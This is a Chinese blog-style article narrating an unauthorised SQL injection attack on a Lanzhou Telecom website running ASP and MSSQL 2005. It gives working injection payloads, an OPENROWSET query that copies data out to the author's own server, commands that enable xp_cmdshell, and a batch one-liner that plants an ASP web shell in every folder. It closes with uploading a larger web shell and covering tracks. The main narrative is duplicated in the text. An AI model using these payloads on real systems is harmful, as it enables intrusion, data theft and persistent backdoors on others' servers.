MSSQL2005注入攻擊
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:37:47 作者:佚名
我要評(píng)論
電信級(jí)的系統(tǒng)估計(jì)都是采用比較大型的數(shù)據(jù)庫(kù)了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!蘭州電信 號(hào)碼百事通的網(wǎng)站 居然是用IIS ASP!呵呵!ASP估計(jì)腳本小子都玩得很熟悉了!-_- 而且ASP不采用FSO生成靜態(tài)頁(yè)面技術(shù)!
呵呵~其實(shí)注入點(diǎn)并不是那么好找的!畢竟
電信級(jí)的系統(tǒng)估計(jì)都是采用比較大型的數(shù)據(jù)庫(kù)了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!蘭州電信 號(hào)碼百事通的網(wǎng)站 居然是用IIS ASP!呵呵!ASP估計(jì)腳本小子都玩得很熟悉了!-_- 而且ASP不采用FSO生成靜態(tài)頁(yè)面技術(shù)!
呵呵~其實(shí)注入點(diǎn)并不是那么好找的!畢竟是電信的大網(wǎng)站!測(cè)試了好多個(gè)點(diǎn)都失敗,我個(gè)人比較喜歡找那些片偏僻的url連接!那些80%的程序員都會(huì)疏忽~! OK 來(lái)個(gè)經(jīng)典 and 0=0 and 0=1 返回不一樣的結(jié)果!看來(lái)是數(shù)字輸入的了!
不說(shuō)太多~ 再看看是什么數(shù)據(jù)庫(kù) 跟ASP結(jié)合 80% 都是MSSQL了!不過(guò)也有例外的~呵呵例如第2代身份證驗(yàn)證的網(wǎng)站 我記得有好幾個(gè)是采用ASP/ASPX ORACLE 的!題外話就不多說(shuō)了!來(lái)點(diǎn)直接的!
and exists(select @@version)-- 返回正常哦~ 呵呵看來(lái)不會(huì)是ORACLE其他了 要么就是SYBASE 要么就是 MSSQL
那再來(lái)看看 SYBASE 沒(méi)有IS_SRVROLEMEMBER函數(shù)的!只有MS的才會(huì)有!而SYBASE判斷權(quán)限就只有用show_role
and 1=(select IS_SRVROLEMEMBER('sysadmin'))-- 喔? 返回正常哦 , 真大意啊~是SA權(quán)限!
OK那么 就來(lái)個(gè)我的最愛(ài) OPENROWSET
先建一個(gè)表
create table c(dir ntext,num int,f int)--
然后
insert c execute master..xp_dirtree 'c:\',1,1--
insert into OPENROWSET('SQLOLEDB','xxx.xxx.xxx.1';'sa';'p','select * from Northwind.dbo.dirtree')
select * from c--把遠(yuǎn)程的表導(dǎo)到我自己機(jī)器上的MSSQL
發(fā)現(xiàn)報(bào)告錯(cuò)誤
不允許OPENROWSET ~~ 奇怪?? 難道是MSSQL2005?權(quán)限問(wèn)題?靠!那就開(kāi)唄!幸好是SA權(quán)限
EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--開(kāi)始分布式事務(wù)
現(xiàn)在來(lái)真的了!不過(guò)還是有我最擔(dān)心的~ 就是WEB跟DATABASE是分離的!這樣搞起來(lái)就郁悶了!OK!
既然是SA 那就把他的CMDSHELL都開(kāi)了吧~
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
這樣就可以開(kāi)啟CMDSHELL 但是還沒(méi)有添加擴(kuò)展存儲(chǔ)過(guò)程
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
其實(shí)沒(méi)有什么必要的~只是我為了方便防火墻!
再來(lái)執(zhí)行 exec master..xp_cmdshell 'ping 自己IP' 防火墻檢測(cè)到有對(duì)方IP ping自己了呵呵!然后再ping他的WEBSITE
看來(lái)是同一個(gè)IP哦~ 哈哈!那就爽了!那我就直接在他本地寫(xiě)一個(gè)bat吧!
隨便找個(gè)地方用xp_cmdshell寫(xiě)了個(gè)bat 內(nèi)容為
FOR /R "C:\" %%v IN (1.asp) DO echo ^<script language=vbscript runat=server^>execute request(^"z^")^</script^> >%%v
然后用他的xp_cmdshell執(zhí)行 OK
在C盤(pán)下面所有文件夾都有這個(gè)1.asp了~ 呵呵 如此類推
把其他盤(pán)也感染.... 5分鐘過(guò)后!~ 他的所有盤(pán) 所有文件夾都有這個(gè) 1.asp的一句話~ 哈哈!來(lái)到www.lanzhouXXXXX.com 在他的web上面?zhèn)鱾€(gè)大馬子~KO~~... 記得收拾殘局!把之前的垃圾清除~呵呵
and exists(select @@version)-- 返回正常哦~ 呵呵看來(lái)不會(huì)是ORACLE其他了 要么就是SYBASE 要么就是 MSSQL
那再來(lái)看看 SYBASE 沒(méi)有IS_SRVROLEMEMBER函數(shù)的!只有MS的才會(huì)有!而SYBASE判斷權(quán)限就只有用show_role
and 1=(select IS_SRVROLEMEMBER('sysadmin'))-- 喔? 返回正常哦 , 真大意啊~是SA權(quán)限!
OK那么 就來(lái)個(gè)我的最愛(ài) OPENROWSET
先建一個(gè)表
create table c(dir ntext,num int,f int)--
然后
insert c execute master..xp_dirtree 'c:\',1,1--
insert into OPENROWSET('SQLOLEDB','xxx.xxx.xxx.1';'sa';'p','select * from Northwind.dbo.dirtree')
select * from c--把遠(yuǎn)程的表導(dǎo)到我自己機(jī)器上的MSSQL
發(fā)現(xiàn)報(bào)告錯(cuò)誤
不允許OPENROWSET ~~ 奇怪?? 難道是MSSQL2005?權(quán)限問(wèn)題?靠!那就開(kāi)唄!幸好是SA權(quán)限
EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--開(kāi)始分布式事務(wù)
現(xiàn)在來(lái)真的了!不過(guò)還是有我最擔(dān)心的~ 就是WEB跟DATABASE是分離的!這樣搞起來(lái)就郁悶了!OK!
既然是SA 那就把他的CMDSHELL都開(kāi)了吧~
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
這樣就可以開(kāi)啟CMDSHELL 但是還沒(méi)有添加擴(kuò)展存儲(chǔ)過(guò)程
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
其實(shí)沒(méi)有什么必要的~只是我為了方便防火墻!
再來(lái)執(zhí)行 exec master..xp_cmdshell 'ping 自己IP' 防火墻檢測(cè)到有對(duì)方IP ping自己了呵呵!然后再ping他的WEBSITE
看來(lái)是同一個(gè)IP哦~ 哈哈!那就爽了!那我就直接在他本地寫(xiě)一個(gè)bat吧!
隨便找個(gè)地方用xp_cmdshell寫(xiě)了個(gè)bat 內(nèi)容為
FOR /R "C:\" %%v IN (1.asp) DO echo ^<script language=vbscript runat=server^>execute request(^"z^")^</script^> >%%v
然后用他的xp_cmdshell執(zhí)行 OK
在C盤(pán)下面所有文件夾都有這個(gè)1.asp了~ 呵呵 如此類推
把其他盤(pán)也感染.... 5分鐘過(guò)后!~ 他的所有盤(pán) 所有文件夾都有這個(gè) 1.asp的一句話~ 哈哈!來(lái)到www.lanzhouXXXXX.com 在他的web上面?zhèn)鱾€(gè)大馬子~KO~~... 記得收拾殘局!把之前的垃圾清除~呵呵
相關(guān)文章

什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來(lái)攻擊頁(yè)面的,大家都有這樣的經(jīng)歷,就是在訪問(wèn)論壇時(shí),如果這個(gè)論壇比較大,訪問(wèn)的人比較多,打開(kāi)頁(yè)面的速度會(huì)比較慢,對(duì)不?!一般來(lái)說(shuō),訪問(wèn)的人越多,論壇的頁(yè)2024-01-06
Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過(guò)Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過(guò)程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15
這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21- 這篇文章主要介紹了sql手工注入語(yǔ)句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說(shuō)過(guò)關(guān)于http和https的區(qū)別,對(duì)于加密的https,我們一直認(rèn)為它是相對(duì)安全的,可今天要講的是,一種繞過(guò)HTTPS加密得到明文信息的web攻擊方式,不知道這消息對(duì)你2016-08-10iPhone和Mac也會(huì)被黑 一條iMessage密碼可能就被盜了
一直以來(lái)蘋(píng)果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋(píng)果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會(huì)導(dǎo)致用戶信息泄露。2016-07-27- 國(guó)家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號(hào)被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤(pán)記錄器進(jìn)入攻擊者郵箱
面對(duì)惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒(méi)有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤(pán)記錄器,進(jìn)入攻擊者郵箱2016-07-06


